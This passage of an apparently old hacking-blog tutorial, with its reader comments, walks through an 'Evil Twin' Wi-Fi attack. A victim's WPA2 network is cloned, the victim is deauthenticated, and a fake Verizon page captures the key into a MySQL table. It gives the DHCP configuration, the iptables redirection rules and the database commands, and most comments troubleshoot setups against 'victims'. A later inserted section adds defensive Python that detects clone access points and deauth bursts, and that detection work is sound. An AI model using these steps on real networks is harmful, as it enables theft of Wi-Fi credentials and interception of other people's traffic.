forcing.
In this technique, called Evil Twin, we take a different perspective on the attack.
Using a powerful long-range wireless card (Alfa AWUS036NH), we clone the target
network to confuse the victim. Then we deauthenticate the victim from their own
wireless network and wait until they connect to our access point, which looks exactly
like theirs.
When the victim connects, they are redirected to a service page asking for the WPA2
key in order to access the internet. As soon as we get the key, we can either allow
the victim to use the network (maybe improvise some password sniffing?) or just
bring it down manually.
For this example I created a service page based on the Verizon ISP. The files are placed at
the default location (/var/www/). I created a database called wpa2, which can be
done with the following commands:
Login to MySQL:
mysql -u root -p
Finally, start the apache and mysql services and check that everything works by typing
localhost into a web browser.
Commands:
/etc/dhcp3/dhcpd.conf:
ddns-update-style ad-hoc;
default-lease-time 600;
max-lease-time 7200;
subnet 192.168.2.128 netmask 255.255.255.128 {
option subnet-mask 255.255.255.128;
option broadcast-address 192.168.2.255;
option routers 192.168.2.129;
option domain-name-servers 8.8.8.8;
range 192.168.2.130 192.168.2.140;
}
Flush iptables:
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables --table nat --append POSTROUTING --out-interface [internet connection] -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT
echo 1 > /proc/sys/net/ipv4/ip_forward
Redirect traffic:
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination [IP address:80]
iptables -t nat -A POSTROUTING -j MASQUERADE
COMMENTS
Hey sickee!
I uploaded the post and added the download link. The files can be copied and
pasted into the /var/www/ folder. Once that's done, start Apache and MySQL from
the services menu, and type localhost in a web browser to test it.
Let me know how it goes, or contact me in IRC (freenode.net). Nick: deathcorps
Take care
REPLY
Hey otlin, the article has been updated. There were two commands prior to that
missing, which were:
create database wpa2;
use wpa2;
and finally:
create table content(key1 VARCHAR(64), key2 VARCHAR(64));
Try that out and it should work.
Thanks for the feedback!
REPLY
otlin (270 days)
Good day,
thanks for your prompt reply. I checked as you told me and it worked. However, I tried to
open your page as localhost in a web browser, but it doesn't work. I had put all files
from folder verison into folder www. Apache and MySQL had been started before
working with the web browser, but I could see only this:
It works!
This is the default web page for this server.
The web server software is running but no content has been added, yet..
And I have one more question. I am a beginner in working with LINUX, and I ask if it is
possible to create a BASH script for automatically entering all the commands which were
given by you. Please advise.
Take care
REPLY
It works!
This is the default web page for this server.
The web server software is running but no content has been added, yet..
All the best
REPLY
admin
Why does this error message come up on my display? Can you explain it to me please????
REPLY
mysql -u root -p
Note: Default backtrack user/pass are root/toor
Create the database:
create database wpa2;
use wpa2;
create table content(key1 VARCHAR(64), key2 VARCHAR(64));
but my question for admin is:
I'm facing problems watching the video. How would I check the table to see the
passwords?
REPLY
admin (263 days)
@darkey
You have successfully created the database. However, your database is still
empty. That means nobody entered a pass at the service page.
You can see this from the line: Empty set (0.00 sec)
Try accessing your page and enter a value yourself to make sure it works properly!
REPLY
mysql>
I type the password but nothing appears, please help me.
I'm Algerian, sorry, my English is not strong.
Help me teacher.
REPLY
the fake web page from my own machine it worked. I was able to connect to the
fake access point from the test target client machine. However, when I tried to access
the fake web page from the test target client machine I got "web page cannot be found",
as when you are not connected to the internet.
REPLY
admin (245 days)
As much as I would love to agree, this isn't true.
I have tried version 1.0 with bad results. Turns out one of the biggest providers in the
US (Verizon) uses routers with WPS deactivated by default.
Furthermore, large enterprise networks will never have WPS enabled, which makes the
evil twin method perfect for the scenario.
Besides that, I really liked the concept of reaver and am looking forward to trying it
again! Just waiting for a stable release.
Hopefully a stable version will come out before the router manufacturers patch an
update to disable WPS by default.
REPLY
admin (226 days)
Oh boy, this sounds insanely ingenious!
Just how I like it!
Any chance you can send this to my email at technicdynamic@gmail.com ?
If you could specify the purpose of each step also, that would be awesome. I'm
looking into developing a part two of this tutorial.
Even though we have Reaver now (if you noticed, my video came out slightly
before reaver was publicly released), I'm sure all the hackers like to have an extra
card up their sleeve.
Take care John!
REPLY
}
^
Configuration file errors encountered exiting
root@bt:~#
*I have installed the dhcp3-server but I don't find it in /var/run/
Can you help me?
REPLY
It was a typo, my fault: I missed a semi-colon at line 10, like the error says.
You can just insert a semi-colon (;) at line 10, or copy and paste from the website
into the dhcpd.conf file since it is now updated.
This is the line in question, it was like this:
range 192.168.2.130 192.168.2.140
Should be like this:
range 192.168.2.130 192.168.2.140;
Thank you!
REPLY
Boody (232 days)
Hi Admin,
First of all, I would like to thank you a lot for this great video!! Then, I have a question:
everything went great and is working, but when I connect with my other laptop to the
cloned network I get a connection but limited or no connectivity, so when I try to visit
any website it doesn't redirect me to the Verizon page, it just gives me "server not found".
Is there a solution for this?
And one more question: what is that that you posted at the bottom of the page, where
to use it: "You may use these HTML tags and attributes:"
REPLY
Hope I helped in some way and if you still have the problem, let me know. I'm
thinking of working on a forum due to the amount of questions; I know it gets hard
to even find my reply since there are so many comments.
Take care boody
REPLY
You might find that something else is happening with the packets, maybe they're
being sent somewhere where they're not supposed to be sent?
Give it a try and let us know!
Take care buddy!
REPLY
doctorK (226 days)
Thanks for the reply admin
Yes I can see the fake AP with the client but I can't connect to it.
I've a good signal.
What about ifconfig?
I made everything that you said in the tutorial.
Bye
REPLY
We have two interfaces, right? One is connected to the internet and the other one is
the wireless interface used to create the access point.
So let's say you're connected to the internet via cable (eth0). In that case you issue
the command ifconfig and look over there; you should see your IP address.
Starting apache is easy; it already comes pre-installed in Backtrack.
Go to the menu:
Backtrack > Services > HTTP
Hope it helps!
REPLY
, it's really
, which I liked too much and really thanks for sharing, but bro
I have one little problem which is really weird. I DID everything perfectly and I got it
without any errors, but when I try to connect to my new access point, which is
unsecured, using another PC I can't connect to it; I get "unable to connect to AP".
So what do you think the problem is? Is it from my wireless device? I am not sure. I
have an Atheros AR9170 which is supported by the aircrack suite, but I saw in your video you
use 2 interfaces while setting some options: you used wlan0 and next time wlan2, but I
only have one interface which I used in the two settings, which is wlan0. Just wanted
to mention that so you can help me
reading my problem
Ali.
REPLY
The reason I use two interfaces is because after obtaining the key we can usually
make good use of the created access point to implement password sniffing and
such without the need for ARP poisoning.
Is there no other way you can use an interface for internet? I have a rooted Android
that I create an access point for internet with. You can always use eth0 as well.
Take care
REPLY
austin316 (209 days)
Can you please tell me where this came from: 00:12:23:34:45:56
If we don't use the -a option then the clone network will automatically use the MAC of the
interface that is on mon0.
One more question: what IP should I use? Where exactly did yours come from?
REPLY
admin (207 days)
The /etc/dhcp3/dhcpd.conf should actually be different from your wlan settings;
just copy and paste from the article above.
Double check your wlan interface just to make sure it doesn't interfere with the
192.168.2.0/24 subnet.
To delete the network you just bring airbase down. On the terminal where you
opened it, just hold ctrl and press c and you won't see it in the wireless APs
anymore.
Take care
REPLY
Max (183 days)
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination [IP address:80]
I am on college wifi and I don't know what IP address to enter, please help.
REPLY
Here is why this method will never work. The client has stored a profile connecting to
that WPA encrypted wi-fi network. IT IS ENCRYPTED. It is not an open network. SO
whenever the client tries to communicate with the AP all of its DATA packets will be
encrypted. So you are setting up an EVIL TWIN that cannot decode the encrypted data
packets of the client, because you do not know the WPA key. So the client will drop the
connection.
Practically, the client can only authenticate and associate with your evil twin AP. It will not
be able to communicate with it.
That method would work only if the AP has no encryption. The client will send DATA
packets unencrypted and it will be able to communicate with the AP, showing it
the captive web page portal.
REPLY
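The tutorial above clones the victim's SSID as an unencrypted access point after a burst of deauthentication frames, and the comment above explains why the client's saved WPA2 profile makes that clone stand out. As an added example that is not part of the original post or its script, the following Python flags both signs in scan data: an SSID advertised with WPA2 and without encryption at once (or by a BSSID outside the owner's allow-list), and a transmitter sending a burst of deauthentication frames. The scan records, trusted-BSSID list and frame log are constructed sample values, not real captures.

```python
from collections import defaultdict, deque

# Constructed scan results (bssid, ssid, channel, security): sample values, not real captures.
SCAN = [
    ("00:1A:2B:3C:4D:5E", "HomeNet", 6, "WPA2"),
    ("00:12:23:34:45:56", "HomeNet", 6, "OPEN"),   # same name, no encryption: the clone pattern
    ("00:1a:2b:3c:4d:5f", "HomeNet", 11, "WPA2"),  # second legitimate radio of the same network
    ("aa:bb:cc:dd:ee:01", "Cafe", 1, "OPEN"),      # an open network that is simply open
]
# Constructed allow-list of BSSIDs the network owner knows to be their own.
TRUSTED = {"00:1a:2b:3c:4d:5e", "00:1a:2b:3c:4d:5f"}
# Constructed 802.11 management-frame log: (time_s, transmitter, subtype).
FRAMES = [(0.0, "00:1a:2b:3c:4d:5e", "deauth")] + \
         [(1.0 + i * 0.1, "00:12:23:34:45:56", "deauth") for i in range(12)]

def evil_twin_candidates(scan, trusted):
    """Return {ssid: [reasons]} for SSIDs that look cloned. Heuristic 1: one SSID is
    advertised both with WPA2 and with no encryption, which is how a captive-portal
    clone of a WPA2 network shows up. Heuristic 2: an SSID used by a trusted BSSID
    is also sent by a BSSID that is not on the allow-list."""
    by_ssid = defaultdict(dict)  # ssid -> {bssid: security}
    for bssid, ssid, _channel, security in scan:
        by_ssid[ssid][bssid.lower()] = security.upper()
    findings = {}
    for ssid, aps in by_ssid.items():
        reasons = []
        secs = set(aps.values())
        if "OPEN" in secs and len(secs) > 1:
            reasons.append("security mismatch: " + ", ".join(sorted(secs)))
        if any(b in trusted for b in aps):
            unknown = sorted(b for b in aps if b not in trusted)
            if unknown:
                reasons.append("untrusted BSSID: " + ", ".join(unknown))
        if reasons:
            findings[ssid] = reasons
    return findings

def deauth_bursts(frames, threshold=10, window=5.0):
    """Return transmitters that sent more than `threshold` deauthentication frames
    inside any `window`-second span, i.e. the forced-disconnect step of the attack."""
    recent, flagged = defaultdict(deque), set()
    for t, src in sorted((t, s) for t, s, sub in frames if sub == "deauth"):
        q = recent[src.lower()]
        q.append(t)
        while q and t - q[0] > window:  # drop timestamps that fell out of the window
            q.popleft()
        if len(q) > threshold:
            flagged.add(src.lower())
    return flagged
```

A legitimate network with several radios (HomeNet's two trusted BSSIDs above) is not flagged on its own; only the open, unlisted clone and its deauth burst are.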
I have a problem redirecting the traffic. I don't get the Verizon page that
I downloaded, because when I try connecting with it it says limited access and I don't
get redirected to the apache server.
BTW, how do I know the IP that I want to redirect the traffic to?
You just put a random number without telling us how you chose it?
REPLY
Me (150 days)
Yeah, but why not take a weaker encryption algorithm like WEP or one of the many
many WPA2 variants (including WPA RADIUS and WPA MD5) as the fake access point and let
the user enter their password the NORMAL WAY, and crack the encrypted (but weaker
encrypted than WPA2 AES) password that you will get back from the client when he
tries to enter his password the *normal* way.
REPLY
I did improve this method a bit by using airbase instead of the manual config and
other details, as the post is almost a year old.
But I will take a look into creating the MD5 access point.
REPLY
matt (147 days)
I have the same problem arminaven, everything seems to be working ok; when I type
localhost in the attacker computer everything works great. When I try to connect to
the AP with the victim's computer, it doesn't let me connect. Anybody got any
ideas???
Thanks
REPLY
3) ISP isn't needed per se, but it is good practice to save the victim's BSSID. In a
MAC address it works like this: [XX:XX:XX] the first 3 pairs represent the company,
so if you know the company it becomes easier to guess the ISP (only Verizon uses
that router model, for example); the last 3 pairs represent the model.
I'm gonna skip to this:
After many comments and suggestions (almost 100 comments only on this page!),
and a lot of people having issues, I decided to make a script to automate this.
I know I'm not answering your specific question and I'm sorry.
Hopefully it will help you understand it better once you see how the script works.
Expect it before the end of the month! =)
Cheers!
REPLY
bud (124 days)
Hey admin.
I have run ifconfig and got:
root@root:~# ifconfig
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:579 errors:0 dropped:0 overruns:0 frame:0
TX packets:579 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:71001 (71.0 KB) TX bytes:71001 (71.0 KB)
wlan0 Link encap:Ethernet HWaddr d8:5d:4c:90:5f:c2
inet addr:192.168.1.50 Bcast:192.168.1.255 Mask:255.255.255.0
inet6 addr: fe80::da5d:4cff:fe90:5fc2/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:14006 errors:0 dropped:0 overruns:0 frame:0
TX packets:2940 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:4874931 (4.8 MB) TX bytes:314334
Which correction could be made in gedit /etc/dhcp3/dhcpd.conf, which you have written as below:
ddns-update-style ad-hoc;
default-lease-time 600;
max-lease-time 7200;
subnet 192.168.2.128 netmask 255.255.255.128 {
option subnet-mask 255.255.255.128;
option broadcast-address 192.168.2.255;
option routers 192.168.2.129
option domain-name-servers 8.8.8.8;
range 192.168.2.130 192.168.2.140;
}
Thanks for your time!
REPLY
This is a great tutorial, but could you tell me please, do you need to be connected to the
internet in the first place in order to crack it? Is it possible to do that without being
connected to the net? Help me please.
Thanks
REPLY